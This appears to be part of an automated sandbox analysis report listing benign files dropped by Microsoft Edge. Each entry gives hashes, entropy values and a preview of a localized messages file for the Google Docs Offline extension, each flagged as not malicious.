                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):972
                                                                                                                                                      Entropy (8bit):4.621319511196614
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                      MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                      SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                      SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                      SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):990
                                                                                                                                                      Entropy (8bit):4.497202347098541
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                      MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                      SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                      SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                      SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1658
                                                                                                                                                      Entropy (8bit):4.294833932445159
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                      MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                      SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                      SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                      SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1672
                                                                                                                                                      Entropy (8bit):4.314484457325167
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                      MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                      SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                      SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                      SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):935
                                                                                                                                                      Entropy (8bit):4.6369398601609735
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                      MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                      SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                      SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                      SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1065
                                                                                                                                                      Entropy (8bit):4.816501737523951
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                      MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                      SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                      SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                      SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2771
                                                                                                                                                      Entropy (8bit):3.7629875118570055
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                      MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                      SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                      SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                      SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):858
                                                                                                                                                      Entropy (8bit):4.474411340525479
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                      MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                      SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                      SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                      SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):954
                                                                                                                                                      Entropy (8bit):4.6457079159286545
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                      MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                      SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                      SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                      SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):899
                                                                                                                                                      Entropy (8bit):4.474743599345443
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                      MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                      SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                      SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                      SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2230
                                                                                                                                                      Entropy (8bit):3.8239097369647634
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                      MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                      SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                      SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                      SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1160
                                                                                                                                                      Entropy (8bit):5.292894989863142
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                      MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                      SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                      SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                      SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3264
                                                                                                                                                      Entropy (8bit):3.586016059431306
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                      MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                      SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                      SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                      SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3235
                                                                                                                                                      Entropy (8bit):3.6081439490236464
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                      MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                      SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                      SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                      SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3122
                                                                                                                                                      Entropy (8bit):3.891443295908904
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                      MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                      SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                      SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                      SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                      Malicious:false
